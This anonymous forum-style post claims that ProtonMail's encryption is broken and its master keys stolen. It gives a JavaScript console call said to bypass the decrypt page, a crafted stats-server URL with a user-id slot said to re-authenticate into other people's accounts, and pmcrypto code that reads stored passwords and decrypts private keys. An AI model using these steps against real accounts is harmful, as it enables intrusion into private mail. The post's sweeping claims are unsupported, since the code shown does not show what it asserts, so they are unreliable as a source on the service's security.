Privacy for none.

I only pop up once in a while; but needed to note on this. Stay away DNM users - I've been auditing them for a while. They are owned and sniffed. And yeah, they can read your mail. During that "decrypt" page fire up a javascript console and hit mailboxPwSuccess(1,1,1)

The master key can be viewed during the same page using dev tools (priv/pub keys import works too). I grabbed the master keys a long while back and been sniffing for a while. Jumping into others accounts is a call to the piwik to re-auth yourself into the /locked page example:

https://stats.protonmail.ch/piwik.php?action_name=protonmail.ch%2FEdit%20Account%20%7C%20ProtonMail&idsite=1&rec=1&r=000000&h=16&m=35&s=59&url=https%3A%2F%2Fprotonmail.ch%2Finvite&_id=[email/id of user]&_idts=null&_idvc=1&_idn=0&_refts=0&_viewts=null&send_image=0&pdf=0&qt=1&realp=0&wma=0&dir=0&fla=1&java=1&gears=0&ag=0&cookie=1&res=10x10&gt_ms=247

Just this:

function getPrivateKey(){if($("#frontEndPass").length)return     Promise.resolve($("#frontEndPass").val());var pw=pmcrypto.decode_utf8_base64(sessionStorage.protonmail_pw);return pmcrypto.decryptPrivateKey($("#encPrivateKey").val(),pw)}

essentially:

pmcrypto.generateKeysRSA("victim", "pass")
pmcrypto.generateKeysRSA("diklinelovesyou","R00tshell1")
Promise { then=then(),  catch=catch()}
pmcrypto.getHashedPassword("R00tshell1")
 wtNmqaqPG9yLqM1lxF3oabblDuorK7mdPJkkgV8bj+38IesT1XheOGvrN4WqLW9X4+a0F5Z0hjX2/yqyjJIHfA=="

Is enough for me to say fuck no thanks. There is much more, been dk had them owned sniffing for coins for a bit now.